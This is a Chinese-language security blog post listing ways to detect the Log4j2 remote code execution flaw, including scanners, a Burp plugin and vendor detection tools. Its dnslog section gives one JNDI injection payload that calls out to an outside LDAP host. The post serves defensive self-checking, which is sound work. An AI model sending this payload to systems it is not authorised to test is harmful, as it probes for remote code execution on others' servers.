Log4j2 漏洞检测工具清单

VSole2022-01-17 06:43:32

距离Log4j2漏洞公开已经过去一个月了,它所造成的严重影响已经不需要我们重复提及了。随着时间的推移,新的漏洞会不断出现,旧的漏洞会不断消失,而这个Log4j2中的RCE漏洞可能需要好几年的时间才能得到解决。所以,在接下来的一段时间里,这个漏洞依然是我们需要去关注的重点。

本文收集和整理了几种漏洞检测方式和工具,以用于Log4j2漏洞检测和自查。


1、dnslog手动验证方法

首先在dnslog平台获取一个子域名,尝试构造payload,插入请求数据包。

${jndi:ldap://bypass.fzuqgl.ceye.io}

通过dnslog平台是否收到请求,初步判断目标环境是否存在漏洞。

2、Log4j-scan

一款用于查找log4j2漏洞的python脚本,支持url检测,支持HTTP请求头和POST数据参数进行模糊测试。

github项目地址:

https://github.com/fullhunt/log4j-scan

3、Log4j2 burp被动扫描插件

通过插件的方式,将lLog4j2漏洞检测能力集成到burp,从而提升安全测试人员的漏洞发现能力。

github项目地址:

https://github.com/f0ng/log4j2burpscanner

Log4j2 burp被动扫描插件效果:

4、AWVS扫描log4j2漏洞

AWVS14最新版本支持Log4j2漏洞检测,支持批量扫描,漏洞扫描神器是不会让你失望的,准备更新武器库吧。

5、制品级Log4j2漏洞检测工具

本检测工具基于腾讯安全的binAuditor,支持 Jar/Ear/War包上传,一键上传即可获取到检测结果。

检测地址:

https://bsca.ms.qq.com/

Jar包检测结果:

6、Log4j2 本地检测工具

基于长亭牧云产品提取出来的Log4j2本地检测工具,可快速发现当前服务器存在风险的 log4j2 应用。

Log4j2 漏洞检测工具地址:

https://log4j2-detector.chaitin.cn/

7、360 Log4j2检测工具包

浏览器被动式扫描+本地检测工具,提供了一个完整的Log4j2漏洞检测方案,另外,工具包还包含了Log4j2补丁方案,如下图:

漏洞log4j
本作品采用《CC 协议》,转载必须注明作者和本文链接
2021年12月29日,360漏洞云团队监测到Apache官方发布了安全更新,修复了一个Apache Log4j2组件中存在的远程代码执行漏洞漏洞编号:CVE-2021-44832,漏洞威胁等级:中危,漏洞评分:6.6。
Spring Cloud 突发漏洞 Log4j2 的核弹级漏洞刚告一段落,Spring Cloud Gateway 又突发高危漏洞,又得折腾了。。。 2022年3月1日,Spring官方发布了关于Spring Cloud Gateway的两个CVE漏洞,分别为CVE-2022-22946与CVE-2022-22947: 版本/分支/tag:3.4.X
Apache Log4j2是一款优秀的Java日志框架,最近爆出了一个jndi注入的漏洞,影响面非常广,各大厂商都被波及。Log4j2作为日志记录的第三方库,被广泛得到使用,这次主要分享一下,最近的一些调试记录。
漏洞探测辅助平台
2022-12-22 09:14:38
可帮助检测漏洞log4j2 fastjson ruoyi Spring RCE Blind SQL Bland XXE. 我习惯于将服务用tmux放到后台运行2、启动webserver安装python依赖注意,需要用python3.7及以上版本,否则会有兼容性问题,多python推荐使用condacd cola_dnslog. 至此,三端已经全部开启!
可帮助检测漏洞log4j2 fastjson ruoyi Spring RCE Blind SQL Bland XXE. 我习惯于将服务用tmux放到后台运行2、启动webserver安装python依赖注意,需要用python3.7及以上版本,否则会有兼容性问题,多python推荐使用condacd cola_dnslog. 至此,三端已经全部开启!
明确各级网络安全责任人。充分利用云原生技术,推进以微服务模式提供各类安全能力组件接口,推进数字电网安全“中枢”所有专业功能组件分层解耦和接口标准化,建立开放生态,支持后续功能叠加演进。增强产品服务供应链入网安全。提升已入网产品、服务供应链应急能力。实战化锤炼网络安全队伍,加强应急指挥与处置能力。
RCE 攻击包括通过使用系统某个级别的漏洞在系统中注入和执行恶意代码。这允许攻击者在系统中执行命令、窃取、损坏、加密数据等。
2021年,注定是人类历史上极不平凡的一年。新冠疫情不断反复,全球经济也在面临“灾后重建”的种种挑战。同样的,在互联网领域领域,“变种病毒”还未被扑灭,新型漏洞就已经开始肆虐。2021 年最后一个月,全球互联网爆发史诗级高危漏洞Log4J 漏洞,致使互联网每小时遭到数百万次攻击,让 2021 年成为网络安全史上破纪录的一年。Check Point Research (CPR) 报告显示:2021
2023年四大“安全债”
2023-12-20 16:27:23
即将过去的2023年,网络安全、云安全、应用安全、数据安全领域暴露的诸多“安全债”中,有四大债务不但未能充分缓解,反而有在新的一年“爆雷”的风险。
远程劳动力、混合云和零信任趋势正在推动安全团队专注于硬件辅助安全策略,以更好地保护因新冠病毒而发生重大变化的攻击面。为了应对新的挑战,硬件辅助安全被视为获得IT生态系统可见性、管理数字资产以及降低安全团队和计算成本的有效的创新方
VSole
网络安全专家